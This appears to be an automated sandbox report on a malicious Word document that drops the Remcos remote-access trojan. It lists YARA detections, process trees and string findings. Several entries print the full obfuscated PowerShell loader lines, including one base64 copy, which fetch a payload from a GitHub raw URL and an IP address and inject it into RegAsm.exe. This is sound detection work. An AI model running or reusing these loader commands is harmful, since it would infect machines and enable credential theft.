Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00416760 appears 69 times
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.powershell.exe.3900b60.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.powershell.exe.3900b60.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3864, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 3952, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 4076, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.dr Binary or memory string: org.slneighbors
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@34/33@10/6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 18_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$G Cargo Logistic.docx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-EPF38I
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA8FB.tmp
Source: AMG Cargo Logistic.docx OLE indicator, Word Document stream: true
Source: AMG Cargo Logistic.docx OLE indicator, Word Document stream: true
Source: AMG Cargo Logistic.docx OLE document summary: title field not present or empty
Source: AMG Cargo Logistic.docx OLE document summary: title field not present or empty
Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{6BDC8419-19FD-4A85-B752-6E5B13CC56D9}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.464968564.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: AMG Cargo Logistic.docx ReversingLabs: Detection: 13%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
